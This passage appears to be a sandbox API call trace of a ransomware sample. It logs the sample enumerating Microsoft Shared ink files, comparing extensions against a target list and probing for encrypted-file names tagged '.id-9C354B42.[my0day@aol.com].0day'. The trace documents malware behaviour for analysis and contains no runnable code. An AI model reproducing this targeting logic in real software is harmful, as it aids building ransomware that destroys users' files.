Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.930] lstrlenW (lpString=".doc") returned 4 [0055.930] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.931] lstrlenW (lpString=".docx") returned 5 [0055.931] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.935] lstrlenW (lpString=".pdf") returned 4 [0055.936] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.936] lstrlenW (lpString=".xls") returned 4 [0055.937] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.937] lstrlenW (lpString=".xlsx") returned 5 [0055.938] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.939] lstrlenW (lpString=".ppt") returned 4 [0055.940] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.941] lstrlenW (lpString=".zip") returned 4 [0055.941] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.942] lstrlenW (lpString=".rar") returned 4 [0055.942] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.945] lstrlenW (lpString=".bz2") returned 4 [0055.945] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.945] lstrlenW (lpString=".7z") returned 3 [0055.946] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.948] lstrlenW (lpString=".dbf") returned 4 [0055.948] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.949] lstrlenW (lpString=".1cd") returned 4 [0055.950] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.950] lstrlenW (lpString=".jpg") returned 4 [0055.952] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.957] lstrlenW (lpString=".doc") returned 4 [0055.957] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.957] lstrlenW (lpString=".docx") returned 5 [0055.958] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.958] lstrlenW (lpString=".pdf") returned 4 [0055.959] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.959] lstrlenW (lpString=".xls") returned 4 [0055.959] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.959] lstrlenW (lpString=".xlsx") returned 5 [0055.959] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.960] lstrlenW (lpString=".ppt") returned 4 [0055.960] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.960] lstrlenW (lpString=".zip") returned 4 [0055.960] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.960] lstrlenW (lpString=".rar") returned 4 [0055.960] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.960] lstrlenW (lpString=".bz2") returned 4 [0055.960] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.960] lstrlenW (lpString=".7z") returned 3 [0055.960] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.960] lstrlenW (lpString=".dbf") returned 4 [0055.960] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.960] lstrlenW (lpString=".1cd") returned 4 [0055.960] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0055.960] lstrlenW (lpString=".jpg") returned 4 [0055.960] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.960] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.960] lstrlenW (lpString="rtscom.dll.mui") returned 14 [0055.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.961] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=2560) returned 1 [0055.961] CloseHandle (hObject=0x170) returned 1 [0055.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui")) returned 0x20 [0055.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.961] lstrlenW (lpString=".doc") returned 4 [0055.961] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.961] lstrlenW (lpString=".docx") returned 5 [0055.961] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.961] lstrlenW (lpString=".pdf") returned 4 [0055.961] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.961] lstrlenW (lpString=".xls") returned 4 [0055.961] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.961] lstrlenW (lpString=".xlsx") returned 5 [0055.961] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.961] lstrlenW (lpString=".ppt") returned 4 [0055.961] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.961] lstrlenW (lpString=".zip") returned 4 [0055.961] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.961] lstrlenW (lpString=".rar") returned 4 [0055.961] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.961] lstrlenW (lpString=".bz2") returned 4 [0055.962] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString=".7z") returned 3 [0055.962] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString=".dbf") returned 4 [0055.962] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString=".1cd") returned 4 [0055.962] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString=".jpg") returned 4 [0055.962] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString=".doc") returned 4 [0055.962] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString=".docx") returned 5 [0055.962] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.962] lstrlenW (lpString=".pdf") returned 4 [0055.962] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.962] lstrlenW (lpString=".xls") returned 4 [0055.962] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.962] lstrlenW (lpString=".xlsx") returned 5 [0055.962] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.962] lstrlenW (lpString=".ppt") returned 4 [0055.962] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.962] lstrlenW (lpString=".zip") returned 4 [0055.962] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.962] lstrlenW (lpString=".rar") returned 4 [0055.962] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.962] lstrlenW (lpString=".bz2") returned 4 [0055.962] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.962] lstrlenW (lpString=".7z") returned 3 [0055.963] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.963] lstrlenW (lpString=".dbf") returned 4 [0055.963] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.963] lstrlenW (lpString=".1cd") returned 4 [0055.963] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0055.963] lstrlenW (lpString=".jpg") returned 4 [0055.963] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.963] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.963] lstrlenW (lpString="ShapeCollector.exe.mui") returned 22 [0055.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.963] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=43520) returned 1 [0055.963] CloseHandle (hObject=0x170) returned 1 [0055.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui")) returned 0x20 [0055.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString=".doc") returned 4 [0055.964] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.964] lstrlenW (lpString=".docx") returned 5 [0055.964] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0055.964] lstrlenW (lpString=".pdf") returned 4 [0055.964] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.964] lstrlenW (lpString=".xls") returned 4 [0055.964] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.964] lstrlenW (lpString=".xlsx") returned 5 [0055.964] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0055.964] lstrlenW (lpString=".ppt") returned 4 [0055.964] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString=".zip") returned 4 [0055.964] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.964] lstrlenW (lpString=".rar") returned 4 [0055.964] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.964] lstrlenW (lpString=".bz2") returned 4 [0055.964] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.964] lstrlenW (lpString=".7z") returned 3 [0055.964] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString=".dbf") returned 4 [0055.964] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString=".1cd") returned 4 [0055.964] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.964] lstrlenW (lpString=".jpg") returned 4 [0055.965] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString=".doc") returned 4 [0055.965] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.965] lstrlenW (lpString=".docx") returned 5 [0055.965] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0055.965] lstrlenW (lpString=".pdf") returned 4 [0055.965] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.965] lstrlenW (lpString=".xls") returned 4 [0055.965] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.965] lstrlenW (lpString=".xlsx") returned 5 [0055.965] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0055.965] lstrlenW (lpString=".ppt") returned 4 [0055.965] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString=".zip") returned 4 [0055.965] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.965] lstrlenW (lpString=".rar") returned 4 [0055.965] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.965] lstrlenW (lpString=".bz2") returned 4 [0055.965] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.965] lstrlenW (lpString=".7z") returned 3 [0055.965] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString=".dbf") returned 4 [0055.965] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString=".1cd") returned 4 [0055.965] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0055.965] lstrlenW (lpString=".jpg") returned 4 [0055.965] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.966] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.966] lstrlenW (lpString="tabskb.dll.mui") returned 14 [0055.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.981] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=3072) returned 1 [0055.981] CloseHandle (hObject=0x170) returned 1 [0055.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui")) returned 0x20 [0055.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.982] lstrlenW (lpString=".doc") returned 4 [0055.982] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.982] lstrlenW (lpString=".docx") returned 5 [0055.982] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.982] lstrlenW (lpString=".pdf") returned 4 [0055.982] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.982] lstrlenW (lpString=".xls") returned 4 [0055.982] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.982] lstrlenW (lpString=".xlsx") returned 5 [0055.982] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.982] lstrlenW (lpString=".ppt") returned 4 [0055.982] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.982] lstrlenW (lpString=".zip") returned 4 [0055.982] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.982] lstrlenW (lpString=".rar") returned 4 [0055.982] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.982] lstrlenW (lpString=".bz2") returned 4 [0055.982] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.982] lstrlenW (lpString=".7z") returned 3 [0055.982] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.982] lstrlenW (lpString=".dbf") returned 4 [0055.982] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.982] lstrlenW (lpString=".1cd") returned 4 [0055.982] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString=".jpg") returned 4 [0055.983] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString=".doc") returned 4 [0055.983] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.983] lstrlenW (lpString=".docx") returned 5 [0055.983] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.983] lstrlenW (lpString=".pdf") returned 4 [0055.983] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.983] lstrlenW (lpString=".xls") returned 4 [0055.983] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.983] lstrlenW (lpString=".xlsx") returned 5 [0055.983] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.983] lstrlenW (lpString=".ppt") returned 4 [0055.983] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString=".zip") returned 4 [0055.983] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.983] lstrlenW (lpString=".rar") returned 4 [0055.983] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.983] lstrlenW (lpString=".bz2") returned 4 [0055.983] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.983] lstrlenW (lpString=".7z") returned 3 [0055.983] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString=".dbf") returned 4 [0055.983] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.983] lstrlenW (lpString=".1cd") returned 4 [0055.983] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0055.984] lstrlenW (lpString=".jpg") returned 4 [0055.984] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.984] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.984] lstrlenW (lpString="TipBand.dll.mui") returned 15 [0055.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.985] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=3072) returned 1 [0055.985] CloseHandle (hObject=0x170) returned 1 [0055.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui")) returned 0x20 [0055.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.985] lstrlenW (lpString=".doc") returned 4 [0055.985] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.985] lstrlenW (lpString=".docx") returned 5 [0055.985] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.985] lstrlenW (lpString=".pdf") returned 4 [0055.985] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.985] lstrlenW (lpString=".xls") returned 4 [0055.985] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.985] lstrlenW (lpString=".xlsx") returned 5 [0055.985] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.985] lstrlenW (lpString=".ppt") returned 4 [0055.985] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString=".zip") returned 4 [0055.986] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString=".rar") returned 4 [0055.986] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString=".bz2") returned 4 [0055.986] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.986] lstrlenW (lpString=".7z") returned 3 [0055.986] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString=".dbf") returned 4 [0055.986] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString=".1cd") returned 4 [0055.986] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString=".jpg") returned 4 [0055.986] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.986] lstrlenW (lpString=".doc") returned 4 [0055.986] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned 